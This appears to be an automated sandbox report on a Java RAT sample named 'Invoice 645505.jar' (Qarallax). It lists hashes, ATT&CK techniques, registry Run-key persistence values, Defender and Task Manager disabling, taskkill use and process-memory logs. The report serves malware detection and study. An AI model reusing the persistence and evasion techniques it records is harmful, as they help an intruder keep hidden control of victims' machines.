qarallax | 409a926c8b06ca68686a8061be80b306eb5c7b1b29aa4e7323540f555254caa8

Analysis

max time kernel
147s
max time network
144s
platform
windows10_x64
resource
win10v200722
submitted
19/08/2020, 10:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice 645505.jar
Size

411KB
MD5

c155328fa4fc5bcef15471d7b260ced4
SHA1

3ed307dfdd397b93f6a6bb2fa69a8f10904d59cb
SHA256

409a926c8b06ca68686a8061be80b306eb5c7b1b29aa4e7323540f555254caa8
SHA512

e9edce2b9e24578164876323f8678fbd62d5426fac48654a597b9776b97ab3a07232cfbfe3e25d988d9ec46fa7e38e425a3806d711174b5294c6124d5cdc88f7

Score

10^/10

evasion trojan persistence qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae1c-60.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
4036	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UeGUQDf = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\plstY\\oxPAo.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\UeGUQDf = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\plstY\\oxPAo.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\plstY\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\plstY\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\plstY\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\plstY\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\klEva	java.exe
File opened for modification	C:\Windows\System32\klEva	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
3564	taskkill.exe
4400	taskkill.exe
4752	taskkill.exe
4312	taskkill.exe
2244	taskkill.exe
1204	taskkill.exe
2664	taskkill.exe
2776	taskkill.exe
2316	taskkill.exe
4684	taskkill.exe
5072	taskkill.exe
2776	taskkill.exe
4344	taskkill.exe
4604	taskkill.exe
4164	taskkill.exe
5024	taskkill.exe
4124	taskkill.exe
2984	taskkill.exe
3420	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2444	powershell.exe
2444	powershell.exe
2444	powershell.exe
2444	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4036	java.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2244	WMIC.exe
Token: SeSecurityPrivilege	2244	WMIC.exe
Token: SeTakeOwnershipPrivilege	2244	WMIC.exe
Token: SeLoadDriverPrivilege	2244	WMIC.exe
Token: SeSystemProfilePrivilege	2244	WMIC.exe
Token: SeSystemtimePrivilege	2244	WMIC.exe
Token: SeProfSingleProcessPrivilege	2244	WMIC.exe
Token: SeIncBasePriorityPrivilege	2244	WMIC.exe
Token: SeCreatePagefilePrivilege	2244	WMIC.exe
Token: SeBackupPrivilege	2244	WMIC.exe
Token: SeRestorePrivilege	2244	WMIC.exe
Token: SeShutdownPrivilege	2244	WMIC.exe
Token: SeDebugPrivilege	2244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2244	WMIC.exe
Token: SeRemoteShutdownPrivilege	2244	WMIC.exe
Token: SeUndockPrivilege	2244	WMIC.exe
Token: SeManageVolumePrivilege	2244	WMIC.exe
Token: 33	2244	WMIC.exe
Token: 34	2244	WMIC.exe
Token: 35	2244	WMIC.exe
Token: 36	2244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2244	WMIC.exe
Token: SeSecurityPrivilege	2244	WMIC.exe
Token: SeTakeOwnershipPrivilege	2244	WMIC.exe
Token: SeLoadDriverPrivilege	2244	WMIC.exe
Token: SeSystemProfilePrivilege	2244	WMIC.exe
Token: SeSystemtimePrivilege	2244	WMIC.exe
Token: SeProfSingleProcessPrivilege	2244	WMIC.exe
Token: SeIncBasePriorityPrivilege	2244	WMIC.exe
Token: SeCreatePagefilePrivilege	2244	WMIC.exe
Token: SeBackupPrivilege	2244	WMIC.exe
Token: SeRestorePrivilege	2244	WMIC.exe
Token: SeShutdownPrivilege	2244	WMIC.exe
Token: SeDebugPrivilege	2244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2244	WMIC.exe
Token: SeRemoteShutdownPrivilege	2244	WMIC.exe
Token: SeUndockPrivilege	2244	WMIC.exe
Token: SeManageVolumePrivilege	2244	WMIC.exe
Token: 33	2244	WMIC.exe
Token: 34	2244	WMIC.exe
Token: 35	2244	WMIC.exe
Token: 36	2244	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2676	WMIC.exe
Token: SeSecurityPrivilege	2676	WMIC.exe
Token: SeTakeOwnershipPrivilege	2676	WMIC.exe
Token: SeLoadDriverPrivilege	2676	WMIC.exe
Token: SeSystemProfilePrivilege	2676	WMIC.exe
Token: SeSystemtimePrivilege	2676	WMIC.exe
Token: SeProfSingleProcessPrivilege	2676	WMIC.exe
Token: SeIncBasePriorityPrivilege	2676	WMIC.exe
Token: SeCreatePagefilePrivilege	2676	WMIC.exe
Token: SeBackupPrivilege	2676	WMIC.exe
Token: SeRestorePrivilege	2676	WMIC.exe
Token: SeShutdownPrivilege	2676	WMIC.exe
Token: SeDebugPrivilege	2676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2676	WMIC.exe
Token: SeRemoteShutdownPrivilege	2676	WMIC.exe
Token: SeUndockPrivilege	2676	WMIC.exe
Token: SeManageVolumePrivilege	2676	WMIC.exe
Token: 33	2676	WMIC.exe
Token: 34	2676	WMIC.exe
Token: 35	2676	WMIC.exe
Token: 36	2676	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2676	WMIC.exe
Token: SeSecurityPrivilege	2676	WMIC.exe
Token: SeTakeOwnershipPrivilege	2676	WMIC.exe
Token: SeLoadDriverPrivilege	2676	WMIC.exe
Token: SeSystemProfilePrivilege	2676	WMIC.exe
Token: SeSystemtimePrivilege	2676	WMIC.exe
Token: SeProfSingleProcessPrivilege	2676	WMIC.exe
Token: SeIncBasePriorityPrivilege	2676	WMIC.exe
Token: SeCreatePagefilePrivilege	2676	WMIC.exe
Token: SeBackupPrivilege	2676	WMIC.exe
Token: SeRestorePrivilege	2676	WMIC.exe
Token: SeShutdownPrivilege	2676	WMIC.exe
Token: SeDebugPrivilege	2676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2676	WMIC.exe
Token: SeRemoteShutdownPrivilege	2676	WMIC.exe
Token: SeUndockPrivilege	2676	WMIC.exe
Token: SeManageVolumePrivilege	2676	WMIC.exe
Token: 33	2676	WMIC.exe
Token: 34	2676	WMIC.exe
Token: 35	2676	WMIC.exe
Token: 36	2676	WMIC.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	2244	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2444	powershell.exe
Token: SeSecurityPrivilege	2444	powershell.exe
Token: SeTakeOwnershipPrivilege	2444	powershell.exe
Token: SeLoadDriverPrivilege	2444	powershell.exe
Token: SeSystemProfilePrivilege	2444	powershell.exe
Token: SeSystemtimePrivilege	2444	powershell.exe
Token: SeProfSingleProcessPrivilege	2444	powershell.exe
Token: SeIncBasePriorityPrivilege	2444	powershell.exe
Token: SeCreatePagefilePrivilege	2444	powershell.exe
Token: SeBackupPrivilege	2444	powershell.exe
Token: SeRestorePrivilege	2444	powershell.exe
Token: SeShutdownPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeSystemEnvironmentPrivilege	2444	powershell.exe
Token: SeRemoteShutdownPrivilege	2444	powershell.exe
Token: SeUndockPrivilege	2444	powershell.exe
Token: SeManageVolumePrivilege	2444	powershell.exe
Token: 33	2444	powershell.exe
Token: 34	2444	powershell.exe
Token: 35	2444	powershell.exe
Token: 36	2444	powershell.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	4344	taskkill.exe
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4124	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	4400	taskkill.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	5072	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4036	java.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 4036 wrote to memory of 1784	4036	java.exe	67
PID 4036 wrote to memory of 1784	4036	java.exe	67
PID 4036 wrote to memory of 2028	4036	java.exe	69
PID 4036 wrote to memory of 2028	4036	java.exe	69
PID 2028 wrote to memory of 2244	2028	cmd.exe	71
PID 2028 wrote to memory of 2244	2028	cmd.exe	71
PID 4036 wrote to memory of 2424	4036	java.exe	72
PID 4036 wrote to memory of 2424	4036	java.exe	72
PID 2424 wrote to memory of 2676	2424	cmd.exe	74
PID 2424 wrote to memory of 2676	2424	cmd.exe	74
PID 4036 wrote to memory of 504	4036	java.exe	77
PID 4036 wrote to memory of 504	4036	java.exe	77
PID 4036 wrote to memory of 2416	4036	java.exe	79
PID 4036 wrote to memory of 2416	4036	java.exe	79
PID 4036 wrote to memory of 3876	4036	java.exe	81
PID 4036 wrote to memory of 3876	4036	java.exe	81
PID 4036 wrote to memory of 3116	4036	java.exe	82
PID 4036 wrote to memory of 3116	4036	java.exe	82
PID 4036 wrote to memory of 2976	4036	java.exe	84
PID 4036 wrote to memory of 2976	4036	java.exe	84
PID 4036 wrote to memory of 3848	4036	java.exe	86
PID 4036 wrote to memory of 3848	4036	java.exe	86
PID 4036 wrote to memory of 3784	4036	java.exe	88
PID 4036 wrote to memory of 3784	4036	java.exe	88
PID 4036 wrote to memory of 680	4036	java.exe	90
PID 4036 wrote to memory of 680	4036	java.exe	90
PID 4036 wrote to memory of 1396	4036	java.exe	93
PID 4036 wrote to memory of 1396	4036	java.exe	93
PID 1396 wrote to memory of 1196	1396	cmd.exe	95
PID 1396 wrote to memory of 1196	1396	cmd.exe	95
PID 4036 wrote to memory of 2392	4036	java.exe	96
PID 4036 wrote to memory of 2392	4036	java.exe	96
PID 4036 wrote to memory of 2368	4036	java.exe	97
PID 4036 wrote to memory of 2368	4036	java.exe	97
PID 4036 wrote to memory of 2444	4036	java.exe	98
PID 4036 wrote to memory of 2444	4036	java.exe	98
PID 4036 wrote to memory of 2776	4036	java.exe	99
PID 4036 wrote to memory of 2776	4036	java.exe	99
PID 4036 wrote to memory of 3704	4036	java.exe	103
PID 4036 wrote to memory of 3704	4036	java.exe	103
PID 4036 wrote to memory of 1544	4036	java.exe	104
PID 4036 wrote to memory of 1544	4036	java.exe	104
PID 4036 wrote to memory of 3084	4036	java.exe	107
PID 4036 wrote to memory of 3084	4036	java.exe	107
PID 4036 wrote to memory of 3644	4036	java.exe	109
PID 4036 wrote to memory of 3644	4036	java.exe	109
PID 4036 wrote to memory of 3172	4036	java.exe	112
PID 4036 wrote to memory of 3172	4036	java.exe	112
PID 4036 wrote to memory of 480	4036	java.exe	113
PID 4036 wrote to memory of 480	4036	java.exe	113
PID 1396 wrote to memory of 3716	1396	cmd.exe	114
PID 1396 wrote to memory of 3716	1396	cmd.exe	114
PID 4036 wrote to memory of 1480	4036	java.exe	117
PID 4036 wrote to memory of 1480	4036	java.exe	117
PID 4036 wrote to memory of 1272	4036	java.exe	118
PID 4036 wrote to memory of 1272	4036	java.exe	118
PID 4036 wrote to memory of 1104	4036	java.exe	121
PID 4036 wrote to memory of 1104	4036	java.exe	121
PID 4036 wrote to memory of 1100	4036	java.exe	122
PID 4036 wrote to memory of 1100	4036	java.exe	122
PID 4036 wrote to memory of 4116	4036	java.exe	124
PID 4036 wrote to memory of 4116	4036	java.exe	124
PID 4036 wrote to memory of 4148	4036	java.exe	126
PID 4036 wrote to memory of 4148	4036	java.exe	126
PID 4036 wrote to memory of 4252	4036	java.exe	129
PID 4036 wrote to memory of 4252	4036	java.exe	129
PID 4036 wrote to memory of 4312	4036	java.exe	131
PID 4036 wrote to memory of 4312	4036	java.exe	131
PID 4036 wrote to memory of 4336	4036	java.exe	133
PID 4036 wrote to memory of 4336	4036	java.exe	133
PID 4036 wrote to memory of 4372	4036	java.exe	134
PID 4036 wrote to memory of 4372	4036	java.exe	134
PID 4036 wrote to memory of 4464	4036	java.exe	138
PID 4036 wrote to memory of 4464	4036	java.exe	138
PID 4036 wrote to memory of 4568	4036	java.exe	140
PID 4036 wrote to memory of 4568	4036	java.exe	140
PID 4036 wrote to memory of 4672	4036	java.exe	142
PID 4036 wrote to memory of 4672	4036	java.exe	142
PID 4036 wrote to memory of 4688	4036	java.exe	143
PID 4036 wrote to memory of 4688	4036	java.exe	143
PID 4036 wrote to memory of 4752	4036	java.exe	146
PID 4036 wrote to memory of 4752	4036	java.exe	146
PID 4036 wrote to memory of 4820	4036	java.exe	147
PID 4036 wrote to memory of 4820	4036	java.exe	147
PID 4036 wrote to memory of 4848	4036	java.exe	150
PID 4036 wrote to memory of 4848	4036	java.exe	150
PID 4036 wrote to memory of 4904	4036	java.exe	153
PID 4036 wrote to memory of 4904	4036	java.exe	153
PID 4036 wrote to memory of 4936	4036	java.exe	154
PID 4036 wrote to memory of 4936	4036	java.exe	154
PID 4372 wrote to memory of 4976	4372	cmd.exe	155
PID 4372 wrote to memory of 4976	4372	cmd.exe	155
PID 4036 wrote to memory of 5048	4036	java.exe	158
PID 4036 wrote to memory of 5048	4036	java.exe	158
PID 4036 wrote to memory of 5060	4036	java.exe	159
PID 4036 wrote to memory of 5060	4036	java.exe	159
PID 4036 wrote to memory of 2056	4036	java.exe	162
PID 4036 wrote to memory of 2056	4036	java.exe	162
PID 4036 wrote to memory of 3712	4036	java.exe	164
PID 4036 wrote to memory of 3712	4036	java.exe	164
PID 4036 wrote to memory of 2316	4036	java.exe	166
PID 4036 wrote to memory of 2316	4036	java.exe	166
PID 4036 wrote to memory of 4100	4036	java.exe	167
PID 4036 wrote to memory of 4100	4036	java.exe	167
PID 4036 wrote to memory of 3876	4036	java.exe	170
PID 4036 wrote to memory of 3876	4036	java.exe	170
PID 4036 wrote to memory of 3644	4036	java.exe	172
PID 4036 wrote to memory of 3644	4036	java.exe	172
PID 4372 wrote to memory of 1784	4372	cmd.exe	174
PID 4372 wrote to memory of 1784	4372	cmd.exe	174
PID 4036 wrote to memory of 1908	4036	java.exe	175
PID 4036 wrote to memory of 1908	4036	java.exe	175
PID 1908 wrote to memory of 1820	1908	cmd.exe	177
PID 1908 wrote to memory of 1820	1908	cmd.exe	177
PID 4036 wrote to memory of 2244	4036	java.exe	178
PID 4036 wrote to memory of 2244	4036	java.exe	178
PID 1908 wrote to memory of 1480	1908	cmd.exe	180
PID 1908 wrote to memory of 1480	1908	cmd.exe	180
PID 4036 wrote to memory of 4160	4036	java.exe	181
PID 4036 wrote to memory of 4160	4036	java.exe	181
PID 4160 wrote to memory of 4344	4160	cmd.exe	183
PID 4160 wrote to memory of 4344	4160	cmd.exe	183
PID 4160 wrote to memory of 4400	4160	cmd.exe	184
PID 4160 wrote to memory of 4400	4160	cmd.exe	184
PID 4036 wrote to memory of 1104	4036	java.exe	185
PID 4036 wrote to memory of 1104	4036	java.exe	185
PID 1104 wrote to memory of 4140	1104	cmd.exe	187
PID 1104 wrote to memory of 4140	1104	cmd.exe	187
PID 1104 wrote to memory of 4472	1104	cmd.exe	188
PID 1104 wrote to memory of 4472	1104	cmd.exe	188
PID 4036 wrote to memory of 4504	4036	java.exe	189
PID 4036 wrote to memory of 4504	4036	java.exe	189
PID 4504 wrote to memory of 4616	4504	cmd.exe	191
PID 4504 wrote to memory of 4616	4504	cmd.exe	191
PID 4504 wrote to memory of 4252	4504	cmd.exe	192
PID 4504 wrote to memory of 4252	4504	cmd.exe	192
PID 4036 wrote to memory of 4336	4036	java.exe	193
PID 4036 wrote to memory of 4336	4036	java.exe	193
PID 4336 wrote to memory of 4684	4336	cmd.exe	195
PID 4336 wrote to memory of 4684	4336	cmd.exe	195
PID 4336 wrote to memory of 4696	4336	cmd.exe	196
PID 4336 wrote to memory of 4696	4336	cmd.exe	196
PID 4036 wrote to memory of 4548	4036	java.exe	197
PID 4036 wrote to memory of 4548	4036	java.exe	197
PID 4548 wrote to memory of 4828	4548	cmd.exe	199
PID 4548 wrote to memory of 4828	4548	cmd.exe	199
PID 4548 wrote to memory of 4860	4548	cmd.exe	200
PID 4548 wrote to memory of 4860	4548	cmd.exe	200
PID 4036 wrote to memory of 1204	4036	java.exe	201
PID 4036 wrote to memory of 1204	4036	java.exe	201
PID 4036 wrote to memory of 4952	4036	java.exe	203
PID 4036 wrote to memory of 4952	4036	java.exe	203
PID 4952 wrote to memory of 4788	4952	cmd.exe	205
PID 4952 wrote to memory of 4788	4952	cmd.exe	205
PID 4952 wrote to memory of 2092	4952	cmd.exe	206
PID 4952 wrote to memory of 2092	4952	cmd.exe	206
PID 4036 wrote to memory of 4592	4036	java.exe	207
PID 4036 wrote to memory of 4592	4036	java.exe	207
PID 4592 wrote to memory of 1412	4592	cmd.exe	209
PID 4592 wrote to memory of 1412	4592	cmd.exe	209
PID 4592 wrote to memory of 2492	4592	cmd.exe	210
PID 4592 wrote to memory of 2492	4592	cmd.exe	210
PID 4036 wrote to memory of 4884	4036	java.exe	211
PID 4036 wrote to memory of 4884	4036	java.exe	211
PID 4884 wrote to memory of 4848	4884	cmd.exe	213
PID 4884 wrote to memory of 4848	4884	cmd.exe	213
PID 4884 wrote to memory of 3972	4884	cmd.exe	214
PID 4884 wrote to memory of 3972	4884	cmd.exe	214
PID 4036 wrote to memory of 4932	4036	java.exe	215
PID 4036 wrote to memory of 4932	4036	java.exe	215
PID 4932 wrote to memory of 852	4932	cmd.exe	217
PID 4932 wrote to memory of 852	4932	cmd.exe	217
PID 4932 wrote to memory of 5044	4932	cmd.exe	218
PID 4932 wrote to memory of 5044	4932	cmd.exe	218
PID 4036 wrote to memory of 748	4036	java.exe	219
PID 4036 wrote to memory of 748	4036	java.exe	219
PID 748 wrote to memory of 5084	748	cmd.exe	221
PID 748 wrote to memory of 5084	748	cmd.exe	221
PID 748 wrote to memory of 5072	748	cmd.exe	222
PID 748 wrote to memory of 5072	748	cmd.exe	222
PID 4036 wrote to memory of 2304	4036	java.exe	223
PID 4036 wrote to memory of 2304	4036	java.exe	223
PID 2304 wrote to memory of 648	2304	cmd.exe	225
PID 2304 wrote to memory of 648	2304	cmd.exe	225
PID 2304 wrote to memory of 5116	2304	cmd.exe	226
PID 2304 wrote to memory of 5116	2304	cmd.exe	226
PID 4036 wrote to memory of 2880	4036	java.exe	227
PID 4036 wrote to memory of 2880	4036	java.exe	227
PID 2880 wrote to memory of 3588	2880	cmd.exe	229
PID 2880 wrote to memory of 3588	2880	cmd.exe	229
PID 4036 wrote to memory of 2776	4036	java.exe	230
PID 4036 wrote to memory of 2776	4036	java.exe	230
PID 2880 wrote to memory of 2668	2880	cmd.exe	232
PID 2880 wrote to memory of 2668	2880	cmd.exe	232
PID 4036 wrote to memory of 1932	4036	java.exe	233
PID 4036 wrote to memory of 1932	4036	java.exe	233
PID 1932 wrote to memory of 4404	1932	cmd.exe	235
PID 1932 wrote to memory of 4404	1932	cmd.exe	235
PID 1932 wrote to memory of 2640	1932	cmd.exe	236
PID 1932 wrote to memory of 2640	1932	cmd.exe	236
PID 4036 wrote to memory of 2888	4036	java.exe	237
PID 4036 wrote to memory of 2888	4036	java.exe	237
PID 2888 wrote to memory of 2412	2888	cmd.exe	239
PID 2888 wrote to memory of 2412	2888	cmd.exe	239
PID 2888 wrote to memory of 2628	2888	cmd.exe	240
PID 2888 wrote to memory of 2628	2888	cmd.exe	240
PID 4036 wrote to memory of 996	4036	java.exe	241
PID 4036 wrote to memory of 996	4036	java.exe	241
PID 996 wrote to memory of 3396	996	cmd.exe	243
PID 996 wrote to memory of 3396	996	cmd.exe	243
PID 996 wrote to memory of 856	996	cmd.exe	244
PID 996 wrote to memory of 856	996	cmd.exe	244
PID 4036 wrote to memory of 5088	4036	java.exe	245
PID 4036 wrote to memory of 5088	4036	java.exe	245
PID 5088 wrote to memory of 4164	5088	cmd.exe	247
PID 5088 wrote to memory of 4164	5088	cmd.exe	247
PID 5088 wrote to memory of 1820	5088	cmd.exe	248
PID 5088 wrote to memory of 1820	5088	cmd.exe	248
PID 4036 wrote to memory of 1480	4036	java.exe	249
PID 4036 wrote to memory of 1480	4036	java.exe	249
PID 1480 wrote to memory of 1304	1480	cmd.exe	252
PID 1480 wrote to memory of 1304	1480	cmd.exe	252
PID 4036 wrote to memory of 4344	4036	java.exe	253
PID 4036 wrote to memory of 4344	4036	java.exe	253
PID 1480 wrote to memory of 4472	1480	cmd.exe	255
PID 1480 wrote to memory of 4472	1480	cmd.exe	255
PID 4036 wrote to memory of 4576	4036	java.exe	256
PID 4036 wrote to memory of 4576	4036	java.exe	256
PID 4576 wrote to memory of 4700	4576	cmd.exe	258
PID 4576 wrote to memory of 4700	4576	cmd.exe	258
PID 4576 wrote to memory of 4684	4576	cmd.exe	259
PID 4576 wrote to memory of 4684	4576	cmd.exe	259
PID 4036 wrote to memory of 4464	4036	java.exe	260
PID 4036 wrote to memory of 4464	4036	java.exe	260
PID 4464 wrote to memory of 4944	4464	cmd.exe	262
PID 4464 wrote to memory of 4944	4464	cmd.exe	262
PID 4464 wrote to memory of 4572	4464	cmd.exe	263
PID 4464 wrote to memory of 4572	4464	cmd.exe	263
PID 4036 wrote to memory of 5092	4036	java.exe	264
PID 4036 wrote to memory of 5092	4036	java.exe	264
PID 5092 wrote to memory of 4792	5092	cmd.exe	266
PID 5092 wrote to memory of 4792	5092	cmd.exe	266
PID 5092 wrote to memory of 4960	5092	cmd.exe	267
PID 5092 wrote to memory of 4960	5092	cmd.exe	267
PID 4036 wrote to memory of 4672	4036	java.exe	268
PID 4036 wrote to memory of 4672	4036	java.exe	268
PID 4672 wrote to memory of 644	4672	cmd.exe	270
PID 4672 wrote to memory of 644	4672	cmd.exe	270
PID 4672 wrote to memory of 2492	4672	cmd.exe	271
PID 4672 wrote to memory of 2492	4672	cmd.exe	271
PID 4036 wrote to memory of 5028	4036	java.exe	272
PID 4036 wrote to memory of 5028	4036	java.exe	272
PID 5028 wrote to memory of 3972	5028	cmd.exe	274
PID 5028 wrote to memory of 3972	5028	cmd.exe	274
PID 5028 wrote to memory of 5024	5028	cmd.exe	275
PID 5028 wrote to memory of 5024	5028	cmd.exe	275
PID 4036 wrote to memory of 5048	4036	java.exe	276
PID 4036 wrote to memory of 5048	4036	java.exe	276
PID 5048 wrote to memory of 3704	5048	cmd.exe	278
PID 5048 wrote to memory of 3704	5048	cmd.exe	278
PID 5048 wrote to memory of 5072	5048	cmd.exe	279
PID 5048 wrote to memory of 5072	5048	cmd.exe	279
PID 4036 wrote to memory of 5060	4036	java.exe	280
PID 4036 wrote to memory of 5060	4036	java.exe	280
PID 5060 wrote to memory of 648	5060	cmd.exe	282
PID 5060 wrote to memory of 648	5060	cmd.exe	282
PID 4036 wrote to memory of 3564	4036	java.exe	283
PID 4036 wrote to memory of 3564	4036	java.exe	283
PID 5060 wrote to memory of 3052	5060	cmd.exe	285
PID 5060 wrote to memory of 3052	5060	cmd.exe	285
PID 4036 wrote to memory of 3440	4036	java.exe	286
PID 4036 wrote to memory of 3440	4036	java.exe	286
PID 3440 wrote to memory of 3744	3440	cmd.exe	288
PID 3440 wrote to memory of 3744	3440	cmd.exe	288
PID 3440 wrote to memory of 1916	3440	cmd.exe	289
PID 3440 wrote to memory of 1916	3440	cmd.exe	289
PID 4036 wrote to memory of 2324	4036	java.exe	290
PID 4036 wrote to memory of 2324	4036	java.exe	290
PID 2324 wrote to memory of 3752	2324	cmd.exe	292
PID 2324 wrote to memory of 3752	2324	cmd.exe	292
PID 2324 wrote to memory of 388	2324	cmd.exe	293
PID 2324 wrote to memory of 388	2324	cmd.exe	293
PID 4036 wrote to memory of 3772	4036	java.exe	294
PID 4036 wrote to memory of 3772	4036	java.exe	294
PID 3772 wrote to memory of 4152	3772	cmd.exe	296
PID 3772 wrote to memory of 4152	3772	cmd.exe	296
PID 3772 wrote to memory of 4272	3772	cmd.exe	297
PID 3772 wrote to memory of 4272	3772	cmd.exe	297
PID 4036 wrote to memory of 4552	4036	java.exe	298
PID 4036 wrote to memory of 4552	4036	java.exe	298
PID 4552 wrote to memory of 4260	4552	cmd.exe	300
PID 4552 wrote to memory of 4260	4552	cmd.exe	300
PID 4552 wrote to memory of 4148	4552	cmd.exe	301
PID 4552 wrote to memory of 4148	4552	cmd.exe	301
PID 4036 wrote to memory of 4228	4036	java.exe	302
PID 4036 wrote to memory of 4228	4036	java.exe	302
PID 4228 wrote to memory of 4748	4228	cmd.exe	304
PID 4228 wrote to memory of 4748	4228	cmd.exe	304
PID 4036 wrote to memory of 4684	4036	java.exe	305
PID 4036 wrote to memory of 4684	4036	java.exe	305
PID 4228 wrote to memory of 4676	4228	cmd.exe	307
PID 4228 wrote to memory of 4676	4228	cmd.exe	307
PID 4036 wrote to memory of 4728	4036	java.exe	308
PID 4036 wrote to memory of 4728	4036	java.exe	308
PID 4728 wrote to memory of 4752	4728	cmd.exe	310
PID 4728 wrote to memory of 4752	4728	cmd.exe	310
PID 4728 wrote to memory of 4864	4728	cmd.exe	311
PID 4728 wrote to memory of 4864	4728	cmd.exe	311
PID 4036 wrote to memory of 4532	4036	java.exe	312
PID 4036 wrote to memory of 4532	4036	java.exe	312
PID 4532 wrote to memory of 5096	4532	cmd.exe	314
PID 4532 wrote to memory of 5096	4532	cmd.exe	314
PID 4532 wrote to memory of 4528	4532	cmd.exe	315
PID 4532 wrote to memory of 4528	4532	cmd.exe	315
PID 4036 wrote to memory of 3624	4036	java.exe	316
PID 4036 wrote to memory of 3624	4036	java.exe	316
PID 3624 wrote to memory of 3616	3624	cmd.exe	318
PID 3624 wrote to memory of 3616	3624	cmd.exe	318
PID 3624 wrote to memory of 4124	3624	cmd.exe	319
PID 3624 wrote to memory of 4124	3624	cmd.exe	319
PID 4036 wrote to memory of 1004	4036	java.exe	320
PID 4036 wrote to memory of 1004	4036	java.exe	320
PID 1004 wrote to memory of 1608	1004	cmd.exe	322
PID 1004 wrote to memory of 1608	1004	cmd.exe	322
PID 1004 wrote to memory of 756	1004	cmd.exe	323
PID 1004 wrote to memory of 756	1004	cmd.exe	323
PID 4036 wrote to memory of 648	4036	java.exe	324
PID 4036 wrote to memory of 648	4036	java.exe	324
PID 648 wrote to memory of 4384	648	cmd.exe	326
PID 648 wrote to memory of 4384	648	cmd.exe	326
PID 648 wrote to memory of 3436	648	cmd.exe	327
PID 648 wrote to memory of 3436	648	cmd.exe	327
PID 4036 wrote to memory of 4316	4036	java.exe	328
PID 4036 wrote to memory of 4316	4036	java.exe	328
PID 4316 wrote to memory of 1460	4316	cmd.exe	330
PID 4316 wrote to memory of 1460	4316	cmd.exe	330
PID 4316 wrote to memory of 2700	4316	cmd.exe	331
PID 4316 wrote to memory of 2700	4316	cmd.exe	331
PID 4036 wrote to memory of 596	4036	java.exe	332
PID 4036 wrote to memory of 596	4036	java.exe	332
PID 596 wrote to memory of 4128	596	cmd.exe	334
PID 596 wrote to memory of 4128	596	cmd.exe	334
PID 596 wrote to memory of 4152	596	cmd.exe	335
PID 596 wrote to memory of 4152	596	cmd.exe	335
PID 4036 wrote to memory of 1304	4036	java.exe	336
PID 4036 wrote to memory of 1304	4036	java.exe	336
PID 1304 wrote to memory of 4148	1304	cmd.exe	338
PID 1304 wrote to memory of 4148	1304	cmd.exe	338
PID 1304 wrote to memory of 4892	1304	cmd.exe	339
PID 1304 wrote to memory of 4892	1304	cmd.exe	339
PID 4036 wrote to memory of 2056	4036	java.exe	340
PID 4036 wrote to memory of 2056	4036	java.exe	340
PID 2056 wrote to memory of 4768	2056	cmd.exe	342
PID 2056 wrote to memory of 4768	2056	cmd.exe	342
PID 2056 wrote to memory of 1412	2056	cmd.exe	343
PID 2056 wrote to memory of 1412	2056	cmd.exe	343
